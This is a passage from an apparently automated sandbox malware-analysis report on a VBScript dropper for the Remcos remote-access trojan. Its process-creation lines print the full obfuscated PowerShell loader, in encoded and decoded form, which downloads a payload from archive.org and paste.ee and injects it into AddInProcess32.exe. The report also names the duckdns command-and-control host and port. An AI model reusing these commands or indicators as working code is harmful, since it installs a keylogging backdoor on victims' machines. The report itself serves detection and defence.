                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8056 | Thread sleep time: -122500s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060 | Thread sleep count: 4636 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060 | Thread sleep time: -13908000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060 | Thread sleep count: 4862 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8060 | Thread sleep time: -14586000s >= -30000s
                  Source: powershell.exe, 00000006.00000002.1416363718.00000208FB6C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 6D3008
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ((variable '*mdr*').name[3,11,2]-join'')( ('w1'+'zurl = vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'detahno'+'tev.tx'+'tvw3;'+'w1zbase6'+'4c'+'onte'+'nt = (new'+'-obj'+'ect '+'sy'+'stem.net'+'.w'+'ebclient).downloads'+'tring'+'(w1zurl);w'+'1zb'+'in'+'ar'+'ycontent = ['+'sy'+'stem.c'+'on'+'v'+'ert'+']::f'+'r'+'ombas'+'e64string'+'(w1zbase6'+'4conte'+'nt);w1zassembly = ['+'reflect'+'i'+'on.as'+'sembly]'+'::load'+'('+'w1z'+'binarycon'+'tent'+');w1zt'+'ype = w1zass'+'emb'+'ly.gettyp'+'e(vw3'+'ru'+'npe.'+'home'+'vw3);w'+'1zmethod = w'+'1z'+'ty'+'pe.getmethod(vw3vaivw3);w1zm'+'eth'+'od'+'.invoke(w'+'1znull, '+'['+'object[]'+']@(v'+'w30/pwcj'+'n'+'/d/'+'e'+'e.etsap//:sptthvw3 ,'+' vw3desativa'+'dovw3 , '+'v'+'w3desativado'+'vw'+'3 ,'+' vw3d'+'es'+'a'+'tivadov'+'w3,vw'+'3addinp'+'r'+'o'+'cess32vw3,'+'v'+'w3vw3))').replace('vw3',[string][char]39).replace('w1z','$'))"
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerH*
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHW\32Y-
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHW\32R-
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHW\
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managercke
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager|
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.11.dr | Binary or memory string: [Program Manager]
                  Source: AddInProcess32.exe, 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHW\3000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

Source: Yara match, File source: 6.2.powershell.exe.208f4260d38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208fba90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208f4260d38.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208fba90000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.1392660414.00000208F3A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Remote Access Functionality

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, Mutex created: \Sessions\1\BaseNamedObjects\Rmc-DCR6HW
Source: Yara match, File source: 6.2.powershell.exe.208f4260d38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208fba90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208f4260d38.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208fba90000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.1392660414.00000208F3A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
Source: Yara match, File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix (numbers preceding a technique name are the counts shown in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 3 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 212 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 212 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 11 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 2 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Input Capture; 1 Archive Collected Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Web Service; 1 Encrypted Channel; 1 Remote Access Software; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 23 Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1523833; Sample: OIQ1ybtQdW.vbs; Startdate: 02/10/2024; Architecture: WINDOWS; Score: 100). Information recovered from the graph:
Process chain: wscript.exe started powershell.exe; that powershell.exe started a second powershell.exe and conhost.exe; the second powershell.exe started AddInProcess32.exe.
Network: paste.ee (188.114.96.3, port 443, local port 49706, CLOUDFLARENETUS, European Union) and ia600100.us.archive.org (207.241.227.240, port 443, local port 49705, INTERNET-ARCHIVEUS, United States) were contacted by the second powershell.exe; 23spt.duckdns.org (192.169.69.26, port 3000, local ports 49707 and 49714, WOWUS, United States) was contacted by AddInProcess32.exe.
Dropped file: C:\ProgramData\remcos\logs.dat (data), written by AddInProcess32.exe.
Signatures on the sample: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Found malware configuration; 12 other signatures. On paste.ee: Connects to a pastebin service (likely for C&C). On 23spt.duckdns.org: Uses dynamic DNS services.
Signatures on wscript.exe: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures.
Signatures on the first powershell.exe: Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading.
Signatures on the second powershell.exe: Writes to foreign memory regions; Injects a PE file into a foreign processes.
Signatures on AddInProcess32.exe: Detected Remcos RAT; Installs a global keyboard hook.

Source | Detection | Scanner | Label
OIQ1ybtQdW.vbs | 11% | ReversingLabs | Script-WScript.Backdoor.Remcos
OIQ1ybtQdW.vbs | 6% | Virustotal |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
ia600100.us.archive.org | 0% | Virustotal |
23spt.duckdns.org | 15% | Virustotal |
paste.ee | 1% | Virustotal |
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://crl.microsoft | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore6 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
http://paste.ee | 1% | Virustotal |
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Content | 2% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal |
23spt.duckdns.org | 15% | Virustotal |
https://github.com/Pester/Pester | 1% | Virustotal |
http://www.apache.org/licenses/LICENSE-2.0 | 0% | Virustotal |
https://analytics.paste.ee | 1% | Virustotal |
https://paste.ee | 1% | Virustotal |
https://ia600100.us.archive.org/ | 1% | Virustotal |
https://ia600100.us.archive.org | 1% | Virustotal |
https://cdnjs.cloudflare.com | 0% | Virustotal |
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | 10% | Virustotal |
https://www.google.com | 0% | Virustotal |
https://paste.ee/d/nJcWp/0 | 3% | Virustotal |
https://secure.gravatar.com | 0% | Virustotal |
http://ia600100.us.archive.org | 0% | Virustotal |
https://themes.googleusercontent.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ia600100.us.archive.org | 207.241.227.240 | true | false | | unknown
23spt.duckdns.org | 192.169.69.26 | true | true | | unknown
paste.ee | 188.114.96.3 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
23spt.duckdns.org | true | | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt | false | | unknown
https://paste.ee/d/nJcWp/0 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.dmt | wscript.exe, 00000000.00000003.1264393743.000001D788743000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Content | powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://paste.ee | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://crl.microsoft | powershell.exe, 00000002.00000002.1427139598.000001C4654D5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com; | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ia600100.us.arX | powershell.exe, 00000006.00000002.1378588214.00000208E4B33000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://analytics.paste.ee | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://paste.ee | powershell.exe, 00000006.00000002.1378588214.00000208E3863000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore6 | powershell.exe, 00000002.00000002.1429078475.000001C467332000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.google.com | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ia600100.us.archive.org/ | powershell.exe, 00000006.00000002.1414917248.00000208FB430000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.orgX | powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://analytics.paste.ee; | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://ia600100.us.archive.org | powershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://cdnjs.cloudflare.com | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.1429078475.000001C46734B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdnjs.cloudflare.com; | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.1429078475.000001C4672E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.v | powershell.exe, 00000002.00000002.1427370499.000001C4671C5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://secure.gravatar.com | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://themes.googleusercontent.com | powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.org | powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ia600100.us.archive.org | powershell.exe, 00000006.00000002.1378588214.00000208E4B38000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | paste.ee | European Union | 13335 | CLOUDFLARENETUS | true
192.169.69.26 | 23spt.duckdns.org | United States | 23033 | WOWUS | true
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1523833
                              Start date and time:2024-10-02 05:28:47 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 39s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:OIQ1ybtQdW.vbs
                              renamed because original name is a hash value
                              Original Sample Name:8140d8019e144b3998a9fc991c45be89eb5f83c58f04627ce34c49b3f8d5d368.vbs
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winVBS@8/6@4/3
                              EGA Information:Failed
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .vbs
